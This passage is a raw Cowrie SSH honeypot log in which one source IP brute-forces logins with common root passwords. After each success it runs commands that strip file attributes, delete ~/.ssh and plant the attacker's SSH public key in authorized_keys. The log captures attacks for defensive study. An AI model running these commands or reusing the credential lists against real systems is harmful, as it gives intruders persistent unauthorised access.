ac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:57:27.631883Z","src_ip":"212.227.235.229","session":"72bc75d1bfac"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123321","message":"login attempt [root/Aa123321] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:57:28.616742Z","src_ip":"212.227.235.229","session":"72bc75d1bfac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:57:29.143379Z","src_ip":"212.227.235.229","session":"72bc75d1bfac"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:57:29.144160Z","src_ip":"212.227.235.229","session":"72bc75d1bfac"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:57:29.145308Z","src_ip":"212.227.235.229","session":"72bc75d1bfac"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:57:29.382101Z","src_ip":"212.227.235.229","session":"72bc75d1bfac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:57:29.916248Z","src_ip":"212.227.235.229","session":"72bc75d1bfac"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:57:29.917164Z","src_ip":"212.227.235.229","session":"72bc75d1bfac"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:57:30.155599Z","src_ip":"212.227.235.229","session":"72bc75d1bfac"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:57:30.156784Z","src_ip":"212.227.235.229","session":"72bc75d1bfac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37056,"dst_ip":"1.2.3.4","dst_port":22,"session":"be733101db1c","protocol":"ssh","message":"New connection: 212.227.235.229:37056 (1.2.3.4:22) [session: be733101db1c]","sensor":"my-vps","timestamp":"2025-09-09T01:57:30.384946Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:57:30.386135Z","src_ip":"212.227.235.229","session":"be733101db1c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:57:30.617081Z","src_ip":"212.227.235.229","session":"be733101db1c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:57:31.582974Z","src_ip":"212.227.235.229","session":"be733101db1c"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:57:32.816605Z","src_ip":"212.227.235.229","session":"be733101db1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52552,"dst_ip":"1.2.3.4","dst_port":22,"session":"604d00cbcdc5","protocol":"ssh","message":"New connection: 212.227.235.229:52552 (1.2.3.4:22) [session: 604d00cbcdc5]","sensor":"my-vps","timestamp":"2025-09-09T01:57:33.010294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:57:33.011400Z","src_ip":"212.227.235.229","session":"604d00cbcdc5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37545,"dst_ip":"1.2.3.4","dst_port":22,"session":"c799b655444c","protocol":"ssh","message":"New connection: 212.227.235.229:37545 (1.2.3.4:22) [session: c799b655444c]","sensor":"my-vps","timestamp":"2025-09-09T01:57:33.052115Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:57:33.053743Z","src_ip":"212.227.235.229","session":"c799b655444c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:57:33.097253Z","src_ip":"212.227.235.229","session":"604d00cbcdc5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:57:33.289546Z","src_ip":"212.227.235.229","session":"c799b655444c"}
{"eventid":"cowrie.login.failed","username":"huser","password":"huser1234","message":"login attempt [huser/huser1234] failed","sensor":"my-vps","timestamp":"2025-09-09T01:57:33.482646Z","src_ip":"212.227.235.229","session":"604d00cbcdc5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:57:34.272759Z","src_ip":"212.227.235.229","session":"c799b655444c"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:57:34.510059Z","src_ip":"212.227.235.229","session":"72bc75d1bfac"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:57:34.510907Z","src_ip":"212.227.235.229","session":"c799b655444c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:57:34.570450Z","src_ip":"212.227.235.229","session":"604d00cbcdc5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46042,"dst_ip":"1.2.3.4","dst_port":22,"session":"495ec398d472","protocol":"ssh","message":"New connection: 212.227.235.229:46042 (1.2.3.4:22) [session: 495ec398d472]","sensor":"my-vps","timestamp":"2025-09-09T01:57:47.066117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:57:47.067177Z","src_ip":"212.227.235.229","session":"495ec398d472"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:57:47.295652Z","src_ip":"212.227.235.229","session":"495ec398d472"}
{"eventid":"cowrie.login.failed","username":"butter","password":"12345","message":"login attempt [butter/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T01:57:48.251171Z","src_ip":"212.227.235.229","session":"495ec398d472"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:57:49.482360Z","src_ip":"212.227.235.229","session":"495ec398d472"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40858,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc20fc3aa20a","protocol":"ssh","message":"New connection: 212.227.235.229:40858 (1.2.3.4:22) [session: fc20fc3aa20a]","sensor":"my-vps","timestamp":"2025-09-09T01:57:57.323848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:57:57.324825Z","src_ip":"212.227.235.229","session":"fc20fc3aa20a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:57:57.634829Z","src_ip":"212.227.235.229","session":"fc20fc3aa20a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123qweASD","message":"login attempt [admin/123qweASD] failed","sensor":"my-vps","timestamp":"2025-09-09T01:57:58.912072Z","src_ip":"212.227.235.229","session":"fc20fc3aa20a"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:58:00.224212Z","src_ip":"212.227.235.229","session":"fc20fc3aa20a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60074,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc0b4ce53205","protocol":"ssh","message":"New connection: 212.227.235.229:60074 (1.2.3.4:22) [session: dc0b4ce53205]","sensor":"my-vps","timestamp":"2025-09-09T01:58:05.593877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:58:05.594942Z","src_ip":"212.227.235.229","session":"dc0b4ce53205"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:58:05.702739Z","src_ip":"212.227.235.229","session":"dc0b4ce53205"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@Password","message":"login attempt [root/Admin@Password] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:58:06.173827Z","src_ip":"212.227.235.229","session":"dc0b4ce53205"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:58:06.413121Z","src_ip":"212.227.235.229","session":"dc0b4ce53205"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:58:06.413931Z","src_ip":"212.227.235.229","session":"dc0b4ce53205"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:58:06.414888Z","src_ip":"212.227.235.229","session":"dc0b4ce53205"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:58:06.523703Z","src_ip":"212.227.235.229","session":"dc0b4ce53205"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:58:06.856068Z","src_ip":"212.227.235.229","session":"dc0b4ce53205"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:58:06.856866Z","src_ip":"212.227.235.229","session":"dc0b4ce53205"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:58:06.966965Z","src_ip":"212.227.235.229","session":"dc0b4ce53205"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:58:06.967929Z","src_ip":"212.227.235.229","session":"dc0b4ce53205"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60082,"dst_ip":"1.2.3.4","dst_port":22,"session":"da8131da945e","protocol":"ssh","message":"New connection: 212.227.235.229:60082 (1.2.3.4:22) [session: da8131da945e]","sensor":"my-vps","timestamp":"2025-09-09T01:58:07.072899Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:58:07.073966Z","src_ip":"212.227.235.229","session":"da8131da945e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:58:07.181366Z","src_ip":"212.227.235.229","session":"da8131da945e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:58:07.650111Z","src_ip":"212.227.235.229","session":"da8131da945e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:58:08.759394Z","src_ip":"212.227.235.229","session":"da8131da945e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60092,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdfaba822537","protocol":"ssh","message":"New connection: 212.227.235.229:60092 (1.2.3.4:22) [session: fdfaba822537]","sensor":"my-vps","timestamp":"2025-09-09T01:58:08.865892Z"}
